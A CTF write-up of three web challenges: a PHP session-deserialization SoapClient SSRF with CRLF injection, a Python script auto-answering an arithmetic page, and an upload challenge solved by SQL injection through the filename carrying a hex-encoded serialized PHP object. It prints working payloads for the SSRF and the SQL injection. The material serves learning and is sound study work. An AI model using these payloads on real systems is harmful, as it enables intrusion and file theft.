bestphp’s revenge

Key points: building a POP chain from PHP built-in classes, session deserialization, and CRLF injection.

First, we need to know that PHP session storage is serialized.


When we visit the server with a session id, it finds our session file and deserializes it automatically.

The way I understand it, the session deserialization step is automatic.

The cause of the session deserialization vulnerability here is that serialization and deserialization use different engines (serialize handlers).

```php
<?php
highlight_file(__FILE__);
$b = 'implode';
call_user_func($_GET['f'], $_POST);
session_start();
if (isset($_GET['name'])) {
    $_SESSION['name'] = $_GET['name'];
}
var_dump($_SESSION);
$a = array(reset($_SESSION), 'welcome_to_the_lctf2018');
call_user_func($b, $a);
?>
```

The var_dump output on a fresh visit: `array(0) { }`

One thing to note: the PHP version of the challenge and its environment is fairly old.

call_user_func can be given an array and will call the function directly! 🙄 That stopped working from 7.1.


Articles:

Session deserialization: https://xz.aliyun.com/t/6640#toc-8

Exploiting PHP built-in classes in deserialization: https://www.cnblogs.com/iamstudy/articles/unserialize_in_php_inner_class.html

I still don't know PHP very well!

`session_start(array $options = array()): bool`

`extract(array &$array, int $flags = EXTR_OVERWRITE, string $prefix = ""): int`

Both of these functions take an array argument!

PHP's default session serialize handler is `php`.

Approach:
First set serialize_handler to php_serialize so that our session file is written on the server. Then use extract to overwrite the variable b, and visit the same session file on the server with the same session id. While the session is being deserialized, call_user_func calls ('SoapClient', 'welcome_to_the_lctf2018'), that is:

call_user_func('call_user_func', array('SoapClient', 'welcome_to_the_lctf2018'))

This triggers SoapClient's __call method and runs our payload, achieving SSRF.

Payload:

```
/?f=session_start&name=|O%3A10%3A%22SoapClient%22%3A5%3A%7Bs%3A3%3A%22uri%22%3Bs%3A4%3A%22test%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A15%3A%22_stream_context%22%3Bi%3A0%3Bs%3A11%3A%22_user_agent%22%3Bs%3A32%3A%22upload%0D%0ACookie%3A+PHPSESSID%3Dupload%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D%20
serialize_handler=php_serialize

extract&name=SoapClient
b=call_user_func
```

Such a hard challenge 😫😫😫😫😫

[GXYCTF2019]StrongestMind

Key point: Python script

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2021/8/5 16:46
# @Author : upload
# @File : [GXYCTF2019]StrongestMind.py
# @Software: PyCharm

import re
import time

import requests

burp0_url = "http://3f9707bc-e9ae-4e4d-9e59-a072e1e9854e.node4.buuoj.cn:81/index.php"
burp0_cookies = {"OUTFOX_SEARCH_USER_ID_NCOO": "1935872068.9989924", "UM_distinctid": "17b0b3c6b83d44-005a7fe99cb475-d7e163f-144000-17b0b3c6b84c1f", "PHPSESSID": "a4c18bab1eee3073d7cfdefcdcf8fc5c"}
burp0_headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1", "Origin": "http://3f9707bc-e9ae-4e4d-9e59-a072e1e9854e.node4.buuoj.cn:81", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://3f9707bc-e9ae-4e4d-9e59-a072e1e9854e.node4.buuoj.cn:81/index.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8", "Connection": "close"}
burp0_data = {"answer": "adada"}
requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

# the page shows "<num1> <op> <num2>" between <br> tags; capture the three parts
PATTERN = r'<br>.*<br><br>(.*) (.) (.*)<br><br>'


def solve(num1, op, num2):
    # silly me, I was still thinking about how to handle + - * /; eval does it directly
    # (guard: only digits and one operator reach eval, nothing else from the page)
    num1, num2 = num1.strip(), num2.strip()
    if not (num1.isdigit() and num2.isdigit() and op in '+-*/'):
        raise ValueError(f"unexpected expression: {num1!r} {op!r} {num2!r}")
    return eval(num1 + op + num2)


# open a session first and grab the current page
s = requests.Session()
r = s.get(burp0_url)
ans = None
for num1, op, num2 in re.findall(PATTERN, r.text, re.S):
    ans = solve(num1, op, num2)
    print(ans)

for i in range(1, 2000):
    print(i)
    r2 = s.post(burp0_url, data={"answer": ans})
    if 'flag{' in r2.text:
        print(r2.text)
        break
    # the response carries the next question; compute the next answer from it
    for num1, op, num2 in re.findall(PATTERN, r2.text, re.S):
        ans = solve(num1, op, num2)

    if 'bingo!' in r2.text:
        print("成功")
    elif "算错了呀,重新来吧!" in r2.text:
        print("nono")

    if r2.status_code == 429:  # rate limited, back off for a second
        print("fast")
        time.sleep(1)

# print(num1, op, num2)

# 39206667 + 12942587
```

[安洵杯 2019] Not a File Upload

Key point: code audit

https://www.z1r0s.top/2021/03/16/security/webvuln/unserialize/php-fan-xu-lie-hua/


As you can see:

a protected property is encoded as chr(0)*chr(0) followed by the name;

a private property as chr(0)ClassName chr(0) followed by the name. I hadn't looked at this in a while and forgot! 🙄


Before writing to the database, it deliberately replaces chr(0)*chr(0)!


Serialization and deserialization happen at these two points.
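The session handler mismatch from bestphp's revenge above and the null-byte property-name encoding used here, demonstrated in one added example (my own code, not from the post). The `Injected` class and `tag` property are made up for the demo, and the reader only covers the integer, bool, string, array and object types that appear in this writeup.

```python
# Added example (not from the original post): a minimal reader for PHP's
# serialize() format, showing (1) the session handler mismatch (data written by
# php_serialize read back by the php handler, which splits on '|') and (2) the
# "\0*\0" / "\0Class\0" property-name encoding. "Injected"/"tag" are constructed.

def parse_value(d, p):
    """Parse one PHP value at offset p of d; return (value, next_offset)."""
    t = d[p]
    if t in 'ib':                                  # i:12;  b:1;
        e = d.index(';', p)
        return (int(d[p + 2:e]) if t == 'i' else d[p + 2:e] == '1'), e + 1
    if t == 's':                                   # s:3:"abc";  (byte length)
        c = d.index(':', p + 2)
        n = int(d[p + 2:c])
        return d[c + 2:c + 2 + n], c + n + 4
    if t in 'aO':                                  # a:1:{...}  O:3:"Foo":1:{...}
        cls, p = None, p + 2
        if t == 'O':
            c = d.index(':', p)
            n = int(d[p:c])
            cls, p = d[c + 2:c + 2 + n], c + n + 4
        c = d.index(':', p)
        count, p, items = int(d[p:c]), c + 2, {}
        for _ in range(count):
            k, p = parse_value(d, p)
            v, p = parse_value(d, p)
            items[k] = v
        return (items if cls is None else (cls, items)), p + 1
    raise ValueError(f"unsupported type {t!r} at offset {p}")

def php_handler_decode(raw):
    """Emulate the 'php' session handler: key|value pairs; stop when no '|' is left."""
    out, p = {}, 0
    while (bar := raw.find('|', p)) != -1:
        out[raw[p:bar]], p = parse_value(raw, bar + 1)
    return out

def handler_mismatch_demo():
    """$_SESSION['name'] stored by php_serialize, then read by the php handler."""
    name = '|O:8:"Injected":1:{s:3:"tag";s:11:"constructed";}'  # user-chosen value
    stored = f'a:1:{{s:4:"name";s:{len(name)}:"{name}";}}'      # serialize($_SESSION)
    return php_handler_decode(stored)   # text after '|' comes back as an object

def visibility(prop):
    """Visibility of a property, taken from its serialized name prefix."""
    if prop.startswith('\0*\0'):
        return 'protected', prop[3:]
    if prop.startswith('\0'):
        return 'private', prop[1:].split('\0', 1)[1]
    return 'public', prop
```

The mismatch demo returns the whole php_serialize prefix as the key and the object after `|` as its value, which is why a consistent `session.serialize_handler` on both the write and read path matters; `visibility` shows why a filter on chr(0)*chr(0) alone says nothing about private properties.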

After reading the master's approach, you can inject directly through the INSERT! I first thought of a POP chain, but found that it didn't work!

I considered going through attr, but that's too complex since it also has to be serialized! Just go through title directly!

0x4f3a363a2268656c706572223a323a7b733a393a225c305c305c30696676696577223b623a313b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b7d

Payload:

```
INSERT INTO images (`title`,`filename`,`ext`,`path`,`attr`) VALUES('111','00e93b3872bb9749.png','png','pic/00e93b3872bb9749.png','a:2:{s:5:"width";i:1;s:6:"height";i:1;}')

111','00e93b3872bb9749.png','png','pic/00e93b3872bb9749.png','a:2:{s:5:"width";i:1;s:6:"height";i:1;}')
33','00e93b3872bb9749.png','png','pic/00e93b3872bb9749.png',0x4f3a363a2268656c706572223a323a7b733a393a225c305c305c30696676696577223b623a313b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b7d),('111','00e93b3872bb9749.png','png','pic/00e93b3872bb9749.png','a:2:{s:5:"width";i:1;s:6:"height";i:1;}')
filename="33','00e93b3872bb9749.png','png','pice93b3872bb9749.png',0x4f3a363a2268656c706572223a323a7b733a393a225c305c305c30696676696577223b623a313b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b7d
),('111.jpg"
```

Spend some time debugging it yourself and you'll get it! Hahaha 🥱🥱🥱🥱🥱🥱

Silly me! When I first saw it I thought it was deserialization string escaping! Haha!